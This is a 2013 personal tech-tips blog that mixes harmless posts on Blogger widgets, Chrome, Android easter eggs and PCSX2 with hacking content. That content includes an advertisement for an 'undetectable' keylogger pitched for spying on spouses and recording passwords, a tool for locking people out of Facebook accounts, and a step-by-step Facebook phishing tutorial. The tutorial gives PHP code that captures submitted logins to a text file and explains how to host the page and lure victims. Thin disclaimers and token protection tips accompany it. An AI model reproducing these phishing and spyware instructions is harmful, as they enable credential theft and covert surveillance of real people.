Thursday, 25 April 2013

Google Chrome Tricks: iChrome

Wanna solve mathematical equations while surfing the net, not bothering to open the calculator:

Chrome has made things easier for you--
Just type the equation in the address bar and you will get it a dropbox shows you the answer to the problem...

Friday, 19 April 2013

Winspy Keylogger

Disclaimer: This Article is for educational purposes only. Don't misuse it and the author does not take the responsibility of the damage caused by you.

A good keylogger monitoring emails, ... etc, and is fully undetectable. It can spy on both local and remote PCs and also included a remote install and realtime remote PC viewer. It captures screenshots also and a hotkey can be used to login and access the program. Users can't simply uninstall or terminate it.


  1. Monitor Chat Room
  2. Monitor by email
  3. Monitor Childern's activity on any PC
  4. Monitor cheating spouse
  5. Record passwords
  6. Monitor Multiple PCs
  7. Monitor PC via Webcam
  8. Fully Undetectable

Monday, 15 April 2013

What are Keyloggers?

Disclaimer: This Article is for educational purposes only. Don't misuse it and the author does not take the responsibility of the damage caused by you.
In this post I will explain what a keylogger is and how to use them will be followed by with some posts in the future.
It is a spying software used to monitor the keystrokes of a PC and are easy to use. Once, it is installed on the target machine it can monitor each and every keystroke of the computer. It can be used for monitoring children, employees etc.
There are 2 type of keyloggers:
  • Hardware Keylogger: Attached between the keyboard and CPU physically, and the person doing so must have the access to the machine. It is very small and almost undetectable and the most powerful one.
  • Software Keylogger: It is one of the most visible form of keylogging i.e. 80% of keyloggers are software based. In this case, it is installed on the computer by a download or so and all the keystrokes are monitored.
Keyloggers are often used by hackers to gain easy access to facebook, gmail etc. accounts. Also they are used by suspicious partners without any proof and of course by parents and employers.

Sunday, 14 April 2013

Portable Apps for pendrive

Miss Google Chrome when working on your friends computer, is the other computer infected and you can't insert your pendrive as it would get infected too, Microsoft Office corrupted and you can't do any work? Well now these thing won't happen at all. Turn your USB into a powerful device with portable antivirus, Google chrome, office, etc. To tailor your needs in less space.

1. Go to and find portable apps for your pendrive.
2. Download and place them on your pendrive and they will be fully functional

Configure 'Social Profiles' widget on Blogger

Many bloggers don't know how to configure their social profiles widget on blogger. it is very very simple to do so. Just follow these steps.
1. Go to Template > Edit HTML
2. Search for the site name of which you want to add the profile(Make sure you are under the right widget before editing the code). For eg.
3. Add you profile URL in front of it like this -
4. Click on save and your widget will be functional.

Delete Blog Archive or other default widgets(Blogger)

Blogger makes mistakes. Sometimes a bug places 2 blog archives on your blog which makes it look bad. You have no way to remove it when you view it from the layout window.

So, here is how to do it:
1. Go to the template window and click on edit HTML
2. Find the name of the widget in the code. For eg. Blog archive 1, Blog Archive 2, Html/Java Script 1, etc.
3. Select the whole line with the coding (Make sure that you have not expanded the widget codings)
4. Now simple delete it.
5. Click on 'Save', a dialog box will appear telling you which widget you have removed.
6. Press O.K. to confirm it and you are done

Friday, 12 April 2013

How to add a poll to a post in your blog

Well this is pretty simple. Follow the steps illustrated the following youtube video created by me.

Note: The Compose and HTML buttons are just in the top left of your textbox.

Friday, 5 April 2013

Convert text to audio

Well, this post just explains the users how to convert the text they want to audio.

Follow the following steps.
1. Open Notepad and paste the following codes.

CreateObject("SAPI.SpVoice").Speak"your text"
2. Save it as speak.vbs

You are done run the file and let the comp. read it to you.

PCSX2: FPS limit "fixed"

People have a complaint that PCSX2 limits FPS and thus decreases gaming speed. On the other side of the aisle, people say framelimiting increases gaming speed.

I tried both and have got the result that while this increases speed, it (very very rarely) reduces optimisation minutely.

So here is how to increase FPS if your system is predominantly fast i.e. with FPS limit it reaches 50FPS easily.

Run the game and press f4

This should disable framelimiting and your game will be nearly double as fast, like 164FPS or 74 FPS as there will be no limit and and the PC can increase FPS above 50 too.

Like and Recommend if this micro-tutorial helped you.

Thursday, 4 April 2013

Favicon icon not changing

This post is for all my friends who own a blog and are trying to change their favicons but without any success.

Here are the solutions:

  • Try to refresh your blog. This will solve your issue for 50% of time
  • If this is not working, go to As soon as this page opens hit refresh and your icon will be changed. Back to your blog and refresh, its done.
You can also delete the browser cache if you like, as an easier alternative.

Know your account creation date: Deleted your Welcome Mail (Gmail)

This post is for those people who like to keep it clean, i.e. Delete all their messages after reading them.

Well these people also sometimes delete the gmail welcome mail, which provides them their account creation date. Now, I have a good new for those who have created their account after 2007.

You can know this creation date by

Going to Settings > Forwarding and POP/IMAP and under POP Download look for:

Status: POP is enabled for all mail that has arrived since "Your Account Creation Date"

Thanx for reading, Please subscribe.

Developer secrets: Android secret picture

Every android version has its own picture hidden inside its OS, for example its a zombie art for gingerbread, Flying androids for ice-cream sandwich, Floating Beans for jellybean etc.
Finding it is quite simple, I found out accidentally while just playing with my phone
1. Go to settings > About Phone > Tap 5-10 times on android version.

While zombie art is not interactive and just an image, the others are not,

  • For ice-cream sandwich keep the android symbol pressed with your finger to get flying androids.
  • For jellybean, hold the jellybean to get floating jellybeans which you can move by dragging with your finger.
That's all, its up to you to discover more of these images. Thank you.

Self Deleting SMS

Want to delete a message after it is read by the recipient automatically? Here is the Sol.

Use Safe-Text, a website that allows to send such messages, and that to free of cost.... (Just for the limitation of 10 messages daily)

To do so follow the following steps:
1. To register and activate, text "Wired" to 83118 (Charged at your local standard rate).
2. Write your confidential message and send
3. the receiver will get the message that he has received a Wired safe text with a link to the internet site that hosts your message.
4. when they click it, they will activate safe text and will have only a few seconds to read the whole text before it self destructs.

Wednesday, 3 April 2013

Phishing: How hackers do it and how to protect yourself

Disclaimer: This Article is for educational purposes only. Don't misuse it and the author does not take the responsibility of the damage caused by you.

My readers ask me how to hack Facebook accounts. Most of the people curious to know how hackers take control of their accounts. In this post, let me clarify those doubts.

Here, I am going to explain one of the popular social engineering attack(luring user into do whatever you asked to do.), called "phishing" .

Phishing is one of the popular hacking technique used by hackers to lure victims into giving their login credentials.

Phishing WebPage:
Phishing webpage is a fake webpage of the target website that helps hackers to lure the victim into believe that they are visiting the legitimate website.

Let me explain how hackers create a facebook phishing page.
Step 1:
To make a fake page of the target website , hackers simply use the source code of the website and save it as html page. In most cases , it is facebook. They go to facebook and right click on the website . Select "View source" and copy the code to notepad.

Now search (Press ctrl +f) for keyword "action" in that code.
Here, let me explain what "action" means to. If you have some basic knowledge of web applications, then you already know about that. 'Action' is a HTML attribute that specifies where to send the form-data when a form(In our case, login-form) is submitted.

In the above code, the action attribute has the value that points to facebook login php file ( So when a user click the login button, it will send the data to the login.php page. This php file will check whether the entered password is valid or not .

To capture the form-data, hackers have to change the action value to their php file. So they change the value to ' action="login.php" '. Note: I've removed '' from the value.

Save the file as index.html.

Step 3:
Now , they create a login.php file that will capture the entered data and redirects to original facebook page.

They open the notepad and type the following code:

header("Location: ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");

They open the notepad and just save the file as "pswrds.txt" (without any contents).

Step 5:
To host their phishing page, they need a webhosting. They create a free account in free web hosting providers. Once they have created account in free hosting site, they can host their files and run. Also, their files can be viewed by visiting a specific URL provided when they create an account. For example : ''.

Now they upload those files(index.html,login.php,pswrds.txt) in the free Web hosting site. They make sure the fake page is working or not by vising your url.

Now , they have to lure people into login into their phishing page. Once you login into the page, they can see your login credentials being stored in the "pswrds.txt" file.

Protection is rather simple, but the need is to stay alert,
1. As always, do not open any untrusted mail/ attachment.
2. Check the URL of the site you are on and ensure it is "https".
3. Do not enter any personal information on pop-ups and/or on untrusted sites.
4. etc.... etc.....

These were the major steps, that you can follow.

Credits: +Tasneem Wasim+Rajat Jain 

FB Freezer: How hackers freeze accounts AND the solution

Disclaimer: This Article is for educational purposes only. Don't misuse it and the author does not take the responsibility of the damage caused by you.

Hackers don't use this tool to hack accounts but to freeze the user's access to their accounts. They use a
facebook rule that states 'after 25 or so logins the user accounts get locked temporarily' to their advantage.

1. They download FBfreezer from
2. Enter the email ID of the victim.
3. And simply click on freeze.
That's it and you are trapped.

How to remain protected from this threat:

Relatively simple, always be logged on to facebook via your mobile, no one can freeze your ID then!!